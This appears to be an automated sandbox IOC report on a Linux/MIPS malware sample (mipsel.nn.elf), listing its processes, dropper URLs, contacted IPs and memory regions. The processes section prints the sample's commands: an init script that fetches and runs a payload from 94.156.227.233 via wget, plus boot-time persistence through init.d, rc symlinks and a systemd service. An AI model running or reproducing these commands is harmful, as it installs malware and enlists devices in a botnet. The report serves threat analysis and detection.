Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/mipsel.nn.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/mipsel.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/system

/tmp/mipsel.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/system /etc/rcS.d/S99system

/tmp/mipsel.nn.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"

/tmp/mipsel.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/mipsel.nn.elf

/tmp/mipsel.nn.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/mipsel.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf

/tmp/mipsel.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 36 hidden processes, click here to show them.

URLs

Name

Malicious

http://94.156.227.233/curl.sh

unknown

Details

Name:	http://94.156.227.233/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/mipsel.nn.elf
Source:	mipsel.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://94.156.227.233/lol.sh

unknown

Details

Name:	http://94.156.227.233/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/mipsel.nn.elf
Source:	mipsel.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

unknown

Details

Name:	http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
TargetID:	12
From Memory:	true
Current Path:	/tmp/mipsel.nn.elf
Source:	mipsel.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

http://94.156.227.233/

unknown

Details

Name:	http://94.156.227.233/
TargetID:	-1
From Memory:	true
Source:	mipsel.nn.elf, mipsel.nn.elf.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

16.85.46.116

unknown

United States

141.153.175.98

unknown

United States

102.45.249.42

unknown

Egypt

23.140.163.253

unknown

Reserved

44.91.16.167

unknown

United States

140.6.22.238

unknown

United States

121.65.228.68

unknown

Korea Republic of

161.7.72.236

unknown

United States

9.68.222.108

unknown

United States

64.18.40.137

unknown

United States

27.201.246.133

unknown

China

61.211.208.195

unknown

Japan

114.69.202.214

unknown

New Caledonia

96.247.203.121

unknown

United States

89.208.241.50

unknown

Canada

124.73.226.217

unknown

China

58.8.208.214

unknown

Thailand

171.133.42.3

unknown

United States

220.58.70.65

unknown

Japan

185.244.20.203

unknown

Russian Federation

88.171.194.132

unknown

France

29.3.21.175

unknown

United States

170.77.84.2

unknown

United States

220.177.30.21

unknown

China

77.169.188.118

unknown

Netherlands

133.74.237.150

unknown

Japan

122.7.216.72

unknown

China

96.63.149.75

unknown

Canada

79.10.226.150

unknown

Italy

59.230.212.104

unknown

China

2.247.99.27

unknown

Germany

183.2.254.247

unknown

China

171.103.5.185

unknown

Thailand

143.202.251.198

unknown

Brazil

41.66.30.165

unknown

Cote D'ivoire

69.195.62.189

unknown

United States

9.36.124.206

unknown

United States

25.67.220.192

unknown

United Kingdom

27.101.40.27

unknown

Korea Republic of

131.253.35.135

unknown

United States

166.255.234.85

unknown

United States

209.61.69.15

unknown

United States

167.249.158.85

unknown

Brazil

70.164.45.136

unknown

United States

215.213.100.122

unknown

United States

35.8.245.220

unknown

United States

79.85.134.43

unknown

France

184.248.244.44

unknown

United States

178.102.72.95

unknown

United Kingdom

170.102.237.188

unknown

Sweden

156.120.117.127

unknown

United States

52.123.45.58

unknown

United States

68.96.244.104

unknown

United States

60.147.127.121

unknown

Japan

43.143.48.202

unknown

Japan

201.146.234.65

unknown

Mexico

192.24.88.99

unknown

United States

182.132.33.187

unknown

China

79.58.67.127

unknown

Italy

27.88.105.142

unknown

Japan

24.74.217.237

unknown

United States

40.201.33.135

unknown

United States

201.144.249.133

unknown

Mexico

109.137.56.200

unknown

Belgium

219.112.196.97

unknown

Japan

40.87.51.9

unknown

United States

138.31.144.22

unknown

United States

91.145.155.181

unknown

Poland

116.157.89.240

unknown

China

73.57.116.51

unknown

United States

170.193.12.210

unknown

United States

86.247.50.46

unknown

France

43.159.206.201

unknown

Japan

120.51.142.12

unknown

Japan

140.111.204.148

unknown

Taiwan; Republic of China (ROC)

208.180.27.233

unknown

United States

138.136.49.118

unknown

United States

61.141.200.8

unknown

China

155.0.83.58

unknown

Zambia

145.199.85.218

unknown

Netherlands

144.195.64.92

unknown

United States

143.168.251.169

unknown

United States

156.52.149.20

unknown

Norway

131.41.46.186

unknown

United States

163.25.54.30

unknown

Taiwan; Republic of China (ROC)

141.89.21.61

unknown

Germany

137.15.171.9

unknown

Canada

30.217.220.53

unknown

United States

49.59.36.107

unknown

Korea Republic of

136.34.233.80

unknown

United States

163.113.86.50

unknown

France

124.104.96.28

unknown

Philippines

103.199.102.178

unknown

Hong Kong

18.254.104.182

unknown

United States

223.23.72.115

unknown

Taiwan; Republic of China (ROC)

97.208.174.116

unknown

United States

42.65.62.241

unknown

Taiwan; Republic of China (ROC)

38.143.85.198

unknown

United States

218.57.234.215

unknown

China

181.34.143.208

unknown

Venezuela

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7fb6c4421000

page execute read

7ffdc7f21000

page execute read

7fb6c4462000

page read and write

55aec0665000

page execute read

55aec08f7000

page read and write

7fb74c8cf000

page read and write

7fb6c4467000

page read and write

7fb74cbd9000

page read and write

7fb744021000

page read and write

55aec28f5000

page execute and read and write

7fb74cc26000

page read and write

7fb74cbe1000

page read and write

7fb74b6f7000

page read and write

7fb74c59e000

page read and write

7fb74c1bd000

page read and write

7fb74beff000

page read and write

7fb74c581000

page read and write

7fb74c55e000

page read and write

55aec4952000

page read and write

7fb744000000

page read and write

55aec08ed000

page read and write

7fb74cab0000

page read and write

7fb74bf0d000

page read and write

7ffdc7e34000

page read and write

55aec290c000

page read and write

There are 15 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
mipsel.nn.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportmipsel.nn.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
mipsel.nn.elf